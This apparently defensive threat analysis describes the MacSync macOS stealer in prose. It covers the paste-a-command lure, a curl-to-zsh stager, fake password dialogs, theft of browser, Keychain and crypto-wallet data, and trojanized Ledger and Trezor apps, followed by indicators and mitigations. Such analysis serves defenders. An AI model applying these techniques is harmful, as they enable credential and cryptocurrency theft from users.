MacSync is a stealthy macOS information stealer designed to harvest sensitive credentials, browser data, and most notably, cryptocurrency wallet secrets from infected systems. It leverages a social-engineering delivery technique that bypasses macOS native protections and relies on script-driven execution rather than binary installers. It also features an unusual persistence mechanism involving the trojanization of trusted Electron-based hardware wallet applications such as Ledger and Trezor.
This analysis outlines the complete infection chain, detailed payload mechanics, exfiltration techniques, and persistence strategies, offering defenders insight into detection and mitigation.
Delivery and Infection Chain
ClickFix-Style Social Engineering
MacSync’s delivery begins with a carefully crafted phishing lure:
- Actors create web pages that mimic legitimate macOS software installers, often for cloud storage tools.
- Victims are instructed to copy and paste a single Terminal command to “install” the software — a technique known as a ClickFix-style lure.
- This approach intentionally bypasses macOS protections such as Gatekeeper, notarization checks, and signature enforcement, because the user explicitly executes the command in Terminal.
The lure lands users on domains such as macclouddrive[.]com/s2/, often via chains starting from phishing or compromised sites masquerading as login pages of trusted services.
Stager Script Execution
The One-Liner Command
The Terminal command provided to victims does two key things:
- Prints a fake App Store installation URL to reassure users.
- Uses
curlto fetch and pipe a script directly tozsh, executing it without being written to disk.
This results in a lightweight Zsh script that functions as a loader. It:
- Daemonizes itself to run in the background.
- Fetches a remote AppleScript payload from attacker-controlled infrastructure using hardcoded API keys and tokens.
- Executes the AppleScript directly in memory via
osascript.
Core Payload: AppleScript Infostealer
Once executed, the AppleScript component performs the bulk of malicious activity. It is modular, highly targeted, and designed to harvest high-value data:
Password Phishing Loop
The script immediately displays fake system dialogs requesting the macOS login password:
- It repeatedly shows a lock-style prompt until the user enters a valid password.
- This password is essential because it unlocks encrypted stores such as the macOS Keychain and browser credentials.
Data Theft and Targeting
The AppleScript systematically exfiltrates a variety of sensitive information:
Browser Data
It recursively collects entire profile directories from popular Chromium-based browsers including:
- Google Chrome
- Brave
- Microsoft Edge
- Opera
- Vivaldi
- Yandex
For each, it collects key artifacts such as saved passwords, cookies, history, and autofill data — all of which may be decrypted offline using the phished password.
Cryptocurrency Targets
MacSync’s focus is clear: cryptocurrency users. The malware targets:
- Web3 Wallet Extensions It contains a broad list of extension IDs (such as MetaMask, Binance Wallet, Coinbase Wallet, Trust Wallet, etc.) and traverses browser extension storage to extract secrets.
- Desktop Wallet Applications It copies folders for wallets like Exodus, Electrum, Atomic Wallet, Wasabi, and others, allowing extraction of wallet data and seed phrases.
- Keychain Database The script copies the entire
~/Library/Keychainsdirectory, capturing all credentials including certificates, stored passwords, and secure notes.
Trojanization of Hardware Wallet Applications
A distinguishing feature of MacSync is its ability to trojanize Electron-based hardware wallet companion apps:
- The script conditionally overwrites critical components like
app.asarandInfo.plistinside wallets such as Ledger Live and Trezor Suite. - Because Electron apps do not enforce strict ASAR integrity checks and code signing is loosely validated at runtime, attackers can insert custom code that persists within the legitimate app.
- This allows the wallet application itself to launch malicious UI prompts, phish recovery phrases or PINs over time, and sustain long-term access without detection.
This persistence model effectively turns trusted software into a phishing tool that looks familiar to the victim.
Command-and-Control Infrastructure
MacSync’s infrastructure is modular and evolving:
- Multiple rotating C2 domains with consistent naming schemes handle different builds.
- There are at least eight such domains, each tied to unique tokens.
- The lure domain itself may have multiple paths (/v1–/v3) and clone sites with similar templates, suggesting active campaign iteration.
Exfiltration and Cleanup
Once data is collected:
- The AppleScript archives the stolen files into
osalogging.zip. - It posts the archive to the C2 server via multipart upload.
- Temporary files are deleted to reduce forensic traces.
Detection, Mitigation, and Indicators
Indicators of Compromise (IOCs)
- Execution of curl | zsh based scripts from suspicious domains.
- Unexpected background processes associated with unknown domains.
- Modified Electron app bundles in wallet directories.
Mitigation Strategies
- Avoid executing unverified commands in Terminal.
- Validate downloaded executables against official sources.
- Use Endpoint Detection and Response (EDR) tools capable of detecting in-memory script execution.
- Monitor for unexpected modifications in wallet app bundle files.
Conclusion
MacSync represents a sophisticated evolution in macOS stealer malware. Its reliance on script-based execution, deep integration with cryptocurrency workflows, and innovative trojanization of trusted wallet apps make it a significant threat — particularly to users handling digital assets. Defenders must understand both the social engineering entry point and the deep technical mechanics to effectively spot and counter this campaign.
